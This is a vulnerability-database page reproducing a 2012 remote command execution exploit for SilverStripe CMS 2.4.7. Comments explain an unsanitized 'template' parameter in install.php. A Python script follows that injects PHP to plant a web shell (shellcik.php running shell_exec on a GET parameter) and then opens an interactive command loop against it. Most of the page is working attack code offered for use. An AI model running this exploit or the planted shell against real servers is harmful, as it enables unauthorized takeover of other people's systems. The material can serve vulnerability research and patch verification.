Vulners
Lucene search
SilverStripe CMS 2.4.7 (install.php) Remote Command Execution
##############################
# Exploit Title: SilverStripe CMS 2.4.7 (install.php) Remote Command Execution Exploit
# Date: 26 Nisan 2012
# Author: Mehmet INCE
# Twitter: https://twitter.com/#!/mmetince
# Company: Bilgi Güvenliği Akademisi ( www.bga.com.tr )
# Software Link: http://www.silverstripe.org/assets/downloads/SilverStripe-v2.4.7.tar.gz
# Version: 2.4.7
# Tested on: v2.4.7 with Ubuntu 11.10
# CVE : Could someone can help me about that.
##############################
# First look at install.php on 978 - 993 lines.
#
# if(file_exists('mysite/_config.php')) {
# // Truncate the contents of _config instead of deleting it - we can't re-create it because Windows handles permissions slightly
# // differently to UNIX based filesystems - it takes the permissions from the parent directory instead of retaining them
# $fh = fopen('mysite/_config.php', 'wb');
# fclose($fh);
# }
# $theme = isset($_POST['template']) ? $_POST['template'] : 'blackcandy';
# $locale = isset($_POST['locale']) ? $_POST['locale'] : 'en_US';
# $type = $config['db']['type'];
# $dbConfig = $config['db'][$type];
# if(!$dbConfig) {
# echo "<p style=\"color: red\">Bad config submitted</p><pre>";
# print_r($config);
# echo "</pre>";
# die();
# }
#
# Getting data from user with $_POST['template'] that variable. After that goo 1000. line check that.
#
# $this->writeToFile("mysite/_config.php", <<<PHP
#
# There is starting of write _config.php file. and our $_POST['template'] used to write thata without sanitized.
# So we can put whatever we want to _config.php file. A few little trick i exploit that vulnerabilities
# with that python codes.
#
# Have a nice days.
# Gecmis 23 Nisanimiz kutlu olsun.
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import httplib, urllib, urllib2,sys, getopt
def Menu():
print "\n\n-------------------------------------------------------"
print "-Kullanim Klavuzu [ USAGE ] "
print "-------------------------------------------------------"
print "- Temel Kullanim - I [ Default Usage ] : "
print "- python exo.py www.target.com / \n"
print "- Temel Kullanim - II [ Default Usage ] : "
print "- python exo.py www.target.com /path/ \n"
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
Menu()
exit(1)
host = sys.argv[1]
path = sys.argv[2]
print " [+] Exploit ediliyor..!"
payload="blackcandy');fwrite(fopen("
payload+='"../shellcik.php","w"), '
payload+="'<?php $gelen"
payload+='[email protected]$_GET["gelen"]; echo shell_exec($gelen);?>'
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
'db[MySQLDatabase][server]':'localhost',
'db[MySQLDatabase][username]':'root',
'db[MySQLDatabase][password]':'qwe123',
'db[MySQLDatabase][database]':'SS_mysite',
'db[MSSQLDatabase][server]':'localhost',
'db[MSSQLDatabase][username]':'root',
'db[MSSQLDatabase][password]':'qwe123',
'db[MSSQLDatabase][database]':'SS_mysite',
'db[PostgreSQLDatabase][server]':'localhost',
'db[PostgreSQLDatabase][username]':'root',
'db[PostgreSQLDatabase][password]':'qwe123',
'db[PostgreSQLDatabase][database]':'SS_mysite',
'db[SQLiteDatabase][path]':'/var/www/SilverStripe/assets/.db',
'db[SQLiteDatabase][database]':'SS_mysite',
'admin[username]':'admin',
'admin[password]':'qwe123',
'locale':'en_US',
'template':payload,
'stats':'on',
'go':'Installing SilverStripe...'})
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
basliklar = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-us,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Connection":"keep-alive",
"Referer":"http://" + host + path+"install.php",
"Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
}
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
conn = httplib.HTTPConnection("localhost:80")
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
responce = conn.getresponse()
if responce.status != 200:
print "[+]Http Hatası : " + responce.status + "\n"
print "Cant Exploit!:("
if responce.status == 200:
komut=""
while( komut != "exit" ):
komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read()
# 0day.today [2018-03-13] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2012 00:00Current
7.1High risk
Vulners AI Score7.1